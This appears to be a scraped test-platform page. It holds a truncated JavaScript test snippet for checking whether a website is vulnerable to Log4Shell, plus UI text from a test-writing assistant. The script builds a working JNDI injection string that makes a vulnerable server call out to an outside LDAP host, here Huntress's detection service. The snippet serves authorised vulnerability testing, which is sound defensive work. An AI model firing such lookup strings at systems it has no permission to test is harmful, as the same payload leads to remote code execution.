xxxxxxxxxx//// Change this to the site you wish to test against// As mentioned on huntress Log4Shell, a negative test does // NOT mean that your site is not vulnerable.//// While this script is meant to be generic, you can modify// it to be specific to your login page manually if needed.//// See: https://log4shell.huntress.com///// Note this script was last updated : 14th Dec 2021//// !!! MODIFY THE SITE URL HERE (phptravels, is a dummy testing site)let testSite = "https://www.phptravels.net/"//------------------------------------------------------------------------TEST.log.info("DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.")TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")// Function which helps make this test, easily reusable across multiple URLSSfunction testWebsiteForLog4Shell(testURL) { // Lets get the log4shell test token I.goTo("https://log4shell.huntress.com/") let log4shell_id = I.getText("/html/body/main/div/p[5]/code") let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/"+log4shell_id+"}"; TEST.log.info("Log4Shell Test ID: "+log4shell_id) // Lets go to the target site, and test it I.goTo(testURL) //------------------------------------------------------------------------ if( ( I.see$$("unusual activity") || I.see$$("protected") ) && I.see$$("206.189") ) { TEST.log.info("Log4Shell Test Aborted : your website is protected by a WAF which blocks common attack patterns for this exploit - it is still recommended to validate internally, and ensure your system is protected without the use of a WAF"); }Hi, I'm TAMI (Test Authoring Machine Intelligence).
Let me assist you in writing a test. Tell me a scenario to test, and I’ll write the test script for you!
Hello!
You haven't ran a test yet.
Write a test in the editor,
and hit the "Run" button run the test.